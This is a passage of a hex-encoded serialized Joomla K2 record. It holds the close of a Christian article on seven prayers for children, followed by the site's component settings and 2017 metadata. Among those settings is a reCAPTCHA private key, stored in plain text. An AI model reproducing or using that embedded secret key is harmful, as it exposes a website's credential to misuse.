697665732069732064657465726d696e65642062792074686569722072656c6174696f6e73686970207769746820476f642e20576861742064657465726d696e6573207468652076616c75657320746861742077696c6c20666f726d207468656972207068696c6f736f706879206973206e6f7420686f77206d616e792074696d657320796f7520737065616b20746f207468656d206275742077686f20697320746865204c6f7264206f66207468656972206c697665732e204966206974206973204a6573757320436872697374207468617420697320746865204c6f7264206f66207468656972206c697665732c20746865792077696c6c207475726e206f7574206163636f7264696e6720746f2074686520646976696e6520706c616e2c206f7220656c73652c2074686520646576696c2077696c6c20626520696e20636861726765206f6620686f772074686579207475726e206f75742e2052656d656d62657220746865206368696c6472656e206f6620456c6920696e20312053616d75656c20323a32322e3c2f6c693e0d0a3c6c693e5072617920666f7220796f7572206368696c6472656e20746f206861766520676f6f64206469736365726e6d656e742e204469736365726e6d656e7420697320746865206162696c69747920746f206a7564676520616e64206469736365726e207768617420697320726967687420616e6420776861742069732077726f6e672e20546865206772656174657374206769667420796f752063616e206769766520796f7572206368696c6472656e206973206e6f74206f6e6c792074686520696e737472756374696f6e732062757420746865206162696c69747920746f207365706172617465206265747765656e20726967687420616e642077726f6e6720737563682074686174207768656e207468652069737375657320746865792061726520636f6e66726f6e746564207769746820617265206e6f7420636c6561726c79207772697474656e20696e20626c61636b20616e642077686974652c20746865792063616e206861766520676f6f64206a7564676d656e742e3c2f6c693e0d0a3c6c693e5072617920666f7220796f7572206368696c6472656e20746f2068617665207468652072696768742072656c6174696f6e73686970732e204f6e65206261642072656c6174696f6e73686970206f7574206f662032302063616e206272696e67207468656d20646f776e20616e6420636f7272757074207468656972206675747572652e20416c6c2069742074616b657320746f2064657374726f7920796f7572206368696c6420616e6420616c6c20796f752068617665206c61626f7572656420666f7220696e20796f7572206368696c6420697320746f2068617665206f6e65206261642072656c6174696f6e736869703b2069742063616e207363617474657220616c6c20796f757220776f726b2e205072617920666f72207468656d207468617420746865792077696c6c2065736361706520616c6c2077726f6e672072656c6174696f6e736869707320746861742074686520646576696c2068617320706c61636564206f6e207468656972206a6f75726e657920616e6420746865792077696c6c20636f6e6e65637420746f207468652072696768742072656c6174696f6e7368697073207468617420476f6420686173206f726461696e656420666f7220746865697220737563636573732e3c2f6c693e0d0a3c6c693e5072617920666f7220796f7572206368696c6472656e20746f206d616b652072696768742063686f6963657320696e206c6966653a2063686f696365732061626f7574206c6f636174696f6e2c206361726565722c20616e64206d617272696167652e20507261792074686174207768656e207468652074696d6520636f6d657320666f72207468656d20746f206d616b652074686573652063686f696365732c20746865792077696c6c2063686f6f73652072696768742e2053616d736f6e206d697373656420697420696e206d61726974616c2063686f69636520616e64206865207374617274656420646f776e2074686520726f6164207768657265206865206c6f73742068697320616e6f696e74696e6720616e64206469656420776974682074686520656e656d792e204c6f742063686f73652077686174207365656d656420676f6f6420746f2068697320657965732028692e652e20536f646f6d20616e6420476f6d6f727261682920616e64206865206c6f737420746865206675747572652c2068697320776966652c206368696c6472656e20616e6420616c6c206865206861642e2047656e657369732031333a20372d31343c2f6c693e0d0a3c6c693e507261792074686174206120736869656c64206f66206661766f75722077696c6c20737572726f756e6420796f7572206368696c6472656e2e20417320796f7572206368696c6472656e20676f207468726f756768206c6966652c20746865792077696c6c206e656564206661766f757220626563617573652065766572796f6e65206e6565647320746f2068617665206661766f7572207768657265206272696c6c69616e63652c20737472656e6774682c206f72206566666f72742077696c6c206e6f742064657465726d696e6520796f757220726573756c747320696e206c6966652e2050726179207468617420736f6d65626f647920736f6d6577686572652077696c6c207472656174207468656d206c696b6520796f752077696c6c207472656174207468656d206f72206576656e206265747465722e20596f752077696c6c206167726565207468617420776520616c77617973207472656174206f7572206368696c6472656e2077697468206578747261206361726520616e6420636f6e73696465726174696f6e2e20496620796f752061726520746865207072696e636970616c206f662061207363686f6f6c2c20796f7520616c6d6f737420616c7761797320756e6465727374616e642077687920796f7572206f776e206368696c6420776173206120626974206c61746520696e207375626d697474696e6720616e2061737369676e6d656e742062757420796f7520646f6ee280997420756e6465727374616e6420776879206f74686572206368696c6472656e2064656c61792e205468657265666f7265207072617920666f72207468656d20746f20656e6a6f79206661766f757220776974682070656f706c6520746865792077696c6c206d65657420616e64207468617420746865792077696c6c2062652074726561746564207468652077617920796f7520776f756c6420686176652074726561746564207468656d206f72206576656e206d6f72652e3c2f6c693e0d0a3c6c693e5072617920666f722070726f74656374696f6e20666f72207468656d3b2050726f74656374696f6e20696e206c696665202850732034363a372c2031313b205073203931292e205468657265206973206120736179696e6720696e20536f7574682057657374204e6967657269612074686174207768657265207468652065796573206f6620746865204c6f72642077696c6c206e6f742072656163682c206d617920796f75206e65766572206765742074686572652e2050726f74656374696f6e2069732061207665727920696d706f7274616e742070726179657220666f72206368696c6472656e206173207468657920616c6c2067726f7720757020626563617573652074686572652077696c6c20616c7761797320626520612074696d6520776865726520796f752063616e6e6f742067657420746f2077686572652074686579206172652062757420476f642063616e20616e642077696c6c20616c776179732062652074686572652077697468207468656d20696620796f7520636f6d6d6974207468656d20746f204869732068616e64732e3c2f6c693e0d0a3c6c693e5072617920616761696e7374206e6567617469766520616e6365737472616c20666c6f7773202847656e657369732034393a3236293a20596f75206d757374206163746976656c7920707261792074686174206e6f206e6567617469766520616e6365737472616c20666c6f772077696c6c20637265657020696e746f20746865206c69666520616e6420657870657269656e636573206f6620796f7572206368696c6472656e2e20596f75206d757374207374617274207468617420707261796572206279207265667573696e672074686f736520666c6f777320696e20796f7572206368696c6472656e20616e6420656e737572696e6720796f7520617265206e6f7420646f696e6720616e797468696e6720746f2061637469766174652074686f7365207468696e677320696e20796f7572206c69666520617320746865697220706172656e74732ec2a03c2f6c693e0d0a3c2f6f6c3e0d0a3c703e52656d656d6265722074686174207468657265206172652070656f706c6520696e20796f75722066616d696c79206c696e657320746861742061726520746865206172726f772068656164206f6620746865206e6567617469766520616e6365737472616c20666c6f777320696e20796f7572206c696e656167652c20616e6420796f75206d757374206b6e6f772074686f73652070656f706c6520616e642070726576656e7420796f7572206368696c6472656e2066726f6d20636f6e74616374696e672074686520666c6f777320696e2074686f73652070656f706c652e204e6f74206f6e6c792073686f756c6420796f75207072617920666f7220796f7572206368696c6472656e206265636175736520796f752063616ee2809974207265706c6163652066616d696c792072656c6174696f6e73686970732c2062757420796f752073686f756c6420616c736f20737572726f756e64207468656d2077697468207072617965722e20596f7572206368696c6472656e206d61792077616e7420746f20676f20616e6420677265657420746865697220636f7573696e7320616e642069662074686569722061756e7420697320746865206172726f772068656164206f6620746865206e656761746976652066656d616c6520616e6365737472616c20666c6f77732c20796f752063616ee28099742073746f7020796f7572206368696c642062757420796f752063616e20736869656c6420796f7572206368696c64207769746820707261796572732e3c2f703e0d0a3c703e4c6173746c792c207072617920507320393120616e6420507320353a3132206f76657220796f7572206368696c6472656e20746f6461792e20506c6561642074686520626c6f6f64206f66204a65737573206f766572207468656972206c6976657320616e6420657870657269656e6365732e204465636c61726520746861742074686520626c6f6f64206f66204a657375732077696c6c2064657465726d696e6520746865697220657870657269656e63657320616e64206e6f7420616e79206e6567617469766520616e6365737472616c20666c6f772e3c2f703e0d0a3c703e4e423a204765742074686520426f6f6b7320e2809320476f64e280997320706c616e20666f7220796f757220436f6e63657074696f6e2026616d703b2044656c69766572792c20476f64e280997320706c616e20666f722061204e757273696e67204d6f746865723c2f703e0d0a3c703ec2a03c2f703e223b733a353a226361746964223b733a313a2236223b733a31303a22637265617465645f6279223b733a333a22313939223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30332d32332032303a31333a3335223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a226f72646572223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2230223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a313a2232223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a31343a2246616d696c79202620576f6d656e223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a35313a2233353a736576656e2d7363726970747572616c2d707261796572732d666f722d766963746f72696f75732d6368696c6472656e223b733a373a22636174736c7567223b733a31343a22363a66616d696c792d776f6d656e223b733a363a22617574686f72223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a36393a22636f6d706f6e656e742f6b322f6974656d2f33352d736576656e2d7363726970747572616c2d707261796572732d666f722d766963746f72696f75732d6368696c6472656e223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a32373a22526576204f6c75736f6c612041796f64656c65204172656f67756e223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a31343a2246616d696c79202620576f6d656e223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a31343a2246616d696c79202620576f6d656e223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3335223b733a353a22726f757465223b733a38383a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d33353a736576656e2d7363726970747572616c2d707261796572732d666f722d766963746f72696f75732d6368696c6472656e223b733a353a227469746c65223b733a34383a22536576656e205363726970747572616c205072617965727320666f7220566963746f72696f7573204368696c6472656e223b733a31313a226465736372697074696f6e223b733a3237303a222054657874203a20312053616d75656c20323a32323b2047656e657369732031333a372d31342c2047656e657369732033393a32313b205073616c6d732034363a372c2031313b2039313a312d31362054686572652061726520372070726179657220706f696e747320746861742049206861766520666f756e6420746f206265207665727920696d706f7274616e742c20746861742077696c6c2068656c7020707265736572766520796f7572206368696c6472656e20696620746865792061726520746f206265636f6d6520766963746f72696f757320696e206c696665207265676172646c657373206f662077686574686572207468657920617265206f6c64206f7220796f756e672e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30332d32332031363a32363a3037223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30332d32332031363a32363a3037223b733a383a226